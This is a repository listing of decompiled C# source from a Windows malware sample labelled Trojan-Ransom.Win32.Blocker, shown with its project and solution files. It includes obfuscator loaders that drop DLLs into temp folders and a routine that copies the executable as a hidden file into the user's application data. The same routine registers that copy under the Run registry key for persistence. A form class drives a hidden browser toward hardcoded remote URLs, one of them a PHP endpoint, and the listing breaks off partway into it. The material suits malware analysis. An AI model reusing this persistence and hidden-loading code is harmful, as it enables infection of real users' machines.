Assembly assembly = (Assembly) null;
if (!flag2)
{
try
{
assembly = Assembly.Load(numArray);
}
catch (FileLoadException ex)
{
flag2 = true;
}
catch (BadImageFormatException ex)
{
flag2 = true;
}
}
if (flag2)
{
try
{
string str3 = string.Format("{0}{1}\\", (object) Path.GetTempPath(), (object) str1);
Directory.CreateDirectory(str3);
string str4 = str3 + assemblyInfo.Name + ".dll";
if (!File.Exists(str4))
{
FileStream fileStream = File.OpenWrite(str4);
fileStream.Write(numArray, 0, numArray.Length);
fileStream.Close();
AssemblyResolverHelper.MoveFileEx(str4, (string) null, 4);
AssemblyResolverHelper.MoveFileEx(str3, (string) null, 4);
}
assembly = Assembly.LoadFile(str4);
}
catch
{
}
}
AssemblyResolverHelper.hashtable[(object) str1] = (object) assembly;
return assembly;
}
}
}
return (Assembly) null;
}
internal struct AssemblyInfo
{
public string Name;
public Version Version;
public string Culture;
public string PublicKeyToken;
public string GetAssemblyFullName(bool includeVersion)
{
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append(this.Name);
if (includeVersion && this.Version != (Version) null)
{
stringBuilder.Append(", Version=");
stringBuilder.Append((object) this.Version);
}
stringBuilder.Append(", Culture=");
stringBuilder.Append(this.Culture.Length == 0 ? "neutral" : this.Culture);
stringBuilder.Append(", PublicKeyToken=");
stringBuilder.Append(this.PublicKeyToken.Length == 0 ? "null" : this.PublicKeyToken);
return stringBuilder.ToString();
}
public AssemblyInfo(string assemblyFullName)
{
this.Version = (Version) null;
this.Culture = string.Empty;
this.PublicKeyToken = string.Empty;
this.Name = string.Empty;
string str1 = assemblyFullName;
char[] chArray = new char[1]{ ',' };
foreach (string str2 in str1.Split(chArray))
{
string str3 = str2.Trim();
if (str3.StartsWith("Version="))
this.Version = new Version(str3.Substring(8));
else if (str3.StartsWith("Culture="))
{
this.Culture = str3.Substring(8);
if (this.Culture == "neutral")
this.Culture = string.Empty;
}
else if (str3.StartsWith("PublicKeyToken="))
{
this.PublicKeyToken = str3.Substring(15);
if (this.PublicKeyToken == "null")
this.PublicKeyToken = string.Empty;
}
else
this.Name = str3;
}
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/Attributes/ObfuscateControlFlowAttribute.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.ObfuscateControlFlowAttribute
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
namespace SmartAssembly.Attributes
{
[AttributeUsage(AttributeTargets.Class | AttributeTargets.Struct | AttributeTargets.Constructor | AttributeTargets.Method)]
internal sealed class ObfuscateControlFlowAttribute : Attribute
{
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/Attributes/PoweredByAttribute.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.PoweredByAttribute
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
namespace SmartAssembly.Attributes
{
public sealed class PoweredByAttribute : Attribute
{
public PoweredByAttribute(string s)
{
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/MemoryManagement/MemoryManager.cs
+71
View File
@@ -0,0 +1,71 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.MemoryManagement.MemoryManager
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace SmartAssembly.MemoryManagement
{
public sealed class MemoryManager
{
private static MemoryManager \u0001;
private long \u0001 = DateTime.Now.Ticks;
[DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
private static extern int \u0001(
IntPtr process,
int minimumWorkingSetSize,
int maximumWorkingSetSize);
private void \u0001()
{
try
{
using (Process currentProcess = Process.GetCurrentProcess())
MemoryManager.\u0001(currentProcess.Handle, -1, -1);
}
catch
{
}
}
private void \u0001(object sender, EventArgs e)
{
try
{
long ticks = DateTime.Now.Ticks;
if (ticks - this.\u0001 <= 10000000L)
return;
this.\u0001 = ticks;
this.\u0001();
}
catch
{
}
}
private MemoryManager()
{
Application.Idle += new EventHandler(this.\u0001);
this.\u0001();
}
public static void AttachApp()
{
try
{
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
return;
MemoryManager.\u0001 = new MemoryManager();
}
catch
{
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/ResourceResolver/ResourceResolver.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.ResourceResolver.ResourceResolver
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
namespace SmartAssembly.ResourceResolver
{
public sealed class ResourceResolver
{
public static void AttachApp()
{
try
{
\u0001.\u0001.\u0001();
}
catch (Exception ex)
{
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/Zip/AESCryptoIndirector.cs
+52
View File
@@ -0,0 +1,52 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.AESCryptoIndirector
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
namespace SmartAssembly.Zip
{
public sealed class AESCryptoIndirector : IDisposable
{
private readonly Type m_AcspType;
private readonly object m_AESCryptoServiceProvider;
public AESCryptoIndirector()
{
try
{
this.m_AcspType = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e").GetType("System.Security.Cryptography.AesManaged");
}
catch (FileNotFoundException ex)
{
this.m_AcspType = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.RijndaelManaged");
}
this.m_AESCryptoServiceProvider = Activator.CreateInstance(this.m_AcspType);
}
public ICryptoTransform GetAESCryptoTransform(
byte[] key,
byte[] iv,
bool decrypt)
{
this.m_AcspType.GetProperty("Key").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) key
});
this.m_AcspType.GetProperty("IV").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) iv
});
return (ICryptoTransform) this.m_AcspType.GetMethod(decrypt ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
}
public void Clear() => this.m_AcspType.GetMethod(nameof (Clear)).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
public void Dispose() => this.Clear();
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/Zip/DESCryptoIndirector.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.DESCryptoIndirector
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
using System.Reflection;
using System.Security.Cryptography;
namespace SmartAssembly.Zip
{
public sealed class DESCryptoIndirector : IDisposable
{
private readonly Type m_DcspType;
private readonly object m_DESCryptoServiceProvider;
public DESCryptoIndirector()
{
this.m_DcspType = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.DESCryptoServiceProvider");
this.m_DESCryptoServiceProvider = Activator.CreateInstance(this.m_DcspType);
}
public ICryptoTransform GetDESCryptoTransform(
byte[] key,
byte[] iv,
bool decrypt)
{
this.m_DcspType.GetProperty("Key").GetSetMethod().Invoke(this.m_DESCryptoServiceProvider, new object[1]
{
(object) key
});
this.m_DcspType.GetProperty("IV").GetSetMethod().Invoke(this.m_DESCryptoServiceProvider, new object[1]
{
(object) iv
});
return (ICryptoTransform) this.m_DcspType.GetMethod(decrypt ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.m_DESCryptoServiceProvider, new object[0]);
}
public void Clear() => this.m_DcspType.GetMethod(nameof (Clear)).Invoke(this.m_DESCryptoServiceProvider, new object[0]);
public void Dispose() => this.Clear();
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/Zip/DoNotEncodeStringsAttribute.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.DoNotEncodeStringsAttribute
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
namespace SmartAssembly.Zip
{
[AttributeUsage(AttributeTargets.Assembly | AttributeTargets.Module | AttributeTargets.Class | AttributeTargets.Struct | AttributeTargets.Constructor | AttributeTargets.Method)]
public sealed class DoNotEncodeStringsAttribute : Attribute
{
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/Zip/SimpleZip.cs
+2389
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/Trojan-Ransom.Win32.Blocker.kkro.csproj
+61
View File
@@ -0,0 +1,61 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{1B1DAD52-DFCF-41C0-B394-3688C2A7EBA5}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>WinData</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="browser_bastan\Form1.cs" />
<Compile Include="browser_bastan\Program.cs" />
<Compile Include="browser_bastan\Araclar.cs" />
<Compile Include="SmartAssembly\Attributes\PoweredByAttribute.cs" />
<Compile Include="SmartAssembly\Attributes\ObfuscateControlFlowAttribute.cs" />
<Compile Include="SmartAssembly\AssemblyResolver\AssemblyResolver.cs" />
<Compile Include="SmartAssembly\AssemblyResolver\AssemblyResolverHelper.cs" />
<Compile Include="SmartAssembly\MemoryManagement\MemoryManager.cs" />
<Compile Include="SmartAssembly\ResourceResolver\ResourceResolver.cs" />
<Compile Include="SmartAssembly\Zip\AESCryptoIndirector.cs" />
<Compile Include="SmartAssembly\Zip\DESCryptoIndirector.cs" />
<Compile Include="SmartAssembly\Zip\DoNotEncodeStringsAttribute.cs" />
<Compile Include="SmartAssembly\Zip\SimpleZip.cs" />
<Compile Include="WinData\Properties\Resources.cs" />
<Compile Include="WinData\Properties\Settings.cs" />
<Compile Include="_0001\_0001.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="{b9141284-224a-4b92-8f0a-8b542563c270}" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/Trojan-Ransom.Win32.Blocker.kkro.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WinData", "Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.csproj", "{1B1DAD52-DFCF-41C0-B394-3688C2A7EBA5}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1B1DAD52-DFCF-41C0-B394-3688C2A7EBA5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{1B1DAD52-DFCF-41C0-B394-3688C2A7EBA5}.Debug|Any CPU.Build.0 = Debug|Any CPU
{1B1DAD52-DFCF-41C0-B394-3688C2A7EBA5}.Release|Any CPU.ActiveCfg = Release|Any CPU
{1B1DAD52-DFCF-41C0-B394-3688C2A7EBA5}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/WinData/Properties/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: WinData.Properties.Resources
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace WinData.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) WinData.Properties.Resources.resourceMan, (object) null))
WinData.Properties.Resources.resourceMan = new ResourceManager("WinData.Properties.Resources", typeof (WinData.Properties.Resources).Assembly);
return WinData.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => WinData.Properties.Resources.resourceCulture;
set => WinData.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/WinData/Properties/Settings.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: WinData.Properties.Settings
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace WinData.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/_0001/_0001.cs
+68
View File
@@ -0,0 +1,68 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0001
{
internal sealed class \u0001
{
private static Assembly \u0001 = (Assembly) null;
private static string[] \u0001 = new string[0];
internal static void \u0001()
{
try
{
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u0001.\u0001.\u0001);
}
catch (Exception ex)
{
}
}
private static Assembly \u0001([In] object obj0, [In] ResolveEventArgs obj1)
{
if ((object) \u0001.\u0001.\u0001 == null)
{
lock (\u0001.\u0001.\u0001)
{
\u0001.\u0001.\u0001 = Assembly.Load("{2dc0d367-4601-4bc5-8cd4-ae3a60f57600}, PublicKeyToken=3e56350693f7355e");
if ((object) \u0001.\u0001.\u0001 != null)
\u0001.\u0001.\u0001 = \u0001.\u0001.\u0001.GetManifestResourceNames();
}
}
string name = obj1.Name;
for (int index = 0; index < \u0001.\u0001.\u0001.Length; ++index)
{
if (\u0001.\u0001.\u0001[index] == name)
return !\u0001.\u0001.\u0001() ? (Assembly) null : \u0001.\u0001.\u0001;
}
return (Assembly) null;
}
private static bool \u0001()
{
try
{
StackFrame[] frames = new StackTrace().GetFrames();
for (int index = 2; index < frames.Length; ++index)
{
if ((object) frames[index].GetMethod().Module.Assembly == (object) Assembly.GetExecutingAssembly())
return true;
}
return false;
}
catch
{
return true;
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/_003CModule_003E.cs
+14
View File
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
internal class \u003CModule\u003E
{
static \u003CModule\u003E()
{
SmartAssembly.AssemblyResolver.AssemblyResolver.AttachApp();
SmartAssembly.ResourceResolver.ResourceResolver.AttachApp();
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/_003CPrivateImplementationDetails_003E.cs
+95
View File
@@ -0,0 +1,95 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System.Runtime.InteropServices;
internal sealed class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D1 \u0024\u0024method0x600000b\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D2 \u0024\u0024method0x600000b\u002D2;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D3 \u0024\u0024method0x600000b\u002D3;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D4 \u0024\u0024method0x600000b\u002D4;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000f\u002D1 \u0024\u0024method0x600000f\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D1 \u0024\u0024method0x6000015\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D2 \u0024\u0024method0x6000015\u002D2;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D3 \u0024\u0024method0x6000015\u002D3;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D4 \u0024\u0024method0x6000015\u002D4;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000032\u002D1 \u0024\u0024method0x6000032\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000032\u002D2 \u0024\u0024method0x6000032\u002D2;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000032\u002D3 \u0024\u0024method0x6000032\u002D3;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600003b\u002D1 \u0024\u0024method0x600003b\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600003b\u002D2 \u0024\u0024method0x600003b\u002D2;
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D2
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D3
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D4
{
}
[StructLayout(LayoutKind.Explicit, Size = 1024, Pack = 1)]
private struct \u0024\u0024struct0x600000f\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D2
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D3
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D4
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000032\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000032\u002D2
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0024\u0024struct0x6000032\u002D3
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0024\u0024struct0x600003b\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0024\u0024struct0x600003b\u002D2
{
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/browser_bastan/Araclar.cs
+64
View File
@@ -0,0 +1,64 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Araclar
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace browser_bastan
{
public sealed class Araclar
{
private const string RegKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
private const int FEATURE_DISABLE_NAVIGATION_SOUNDS = 21;
private const int SET_FEATURE_ON_PROCESS = 2;
public static string Regkeyname = "WinData";
public static string DstName = "WinData.exe";
[DllImport("urlmon.dll")]
[return: MarshalAs(UnmanagedType.Error)]
private static extern int CoInternetSetFeatureEnabled(
int FeatureEntry,
[MarshalAs(UnmanagedType.U4)] int dwFlags,
bool fEnable);
public static void DisableClickSounds() => Araclar.CoInternetSetFeatureEnabled(21, 2, true);
public static void Copy(string src, string dst)
{
if (File.Exists(dst))
File.SetAttributes(dst, FileAttributes.Normal);
try
{
File.Copy(src, dst, true);
}
catch (Exception ex)
{
}
File.SetAttributes(dst, FileAttributes.Hidden);
}
public static void Startup(string name, string path)
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (registryKey == null)
return;
registryKey.SetValue(name, (object) path);
registryKey.Close();
}
public static void DstCheck()
{
string location = Assembly.GetExecutingAssembly().Location;
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
if (Path.GetDirectoryName(location) == folderPath)
return;
Araclar.Copy(location, folderPath + "\\" + Araclar.DstName);
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/browser_bastan/Form1.cs
+380
View File
@@ -0,0 +1,380 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Form1
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
public sealed class Form1 : Form
{
private const int GWL_EXSTYLE = -20;
private const int WS_EX_TOOLWINDOW = 128;
private const int INTERNET_OPTION_END_BROWSER_SESSION = 42;
private IContainer components;
private WebBrowser webBrowser1;
private string ana = "http://www.nurullahuzmez.com";
private string baba = "http://[DEGISTIR]/v/v.php";
private Queue<KeyValuePair<string, string>> kelimelistesi = new Queue<KeyValuePair<string, string>>();
private string kelime;
private string domain;
private int suankisayfa = 1;
private Dictionary<string, bool> gezilenler = new Dictionary<string, bool>();
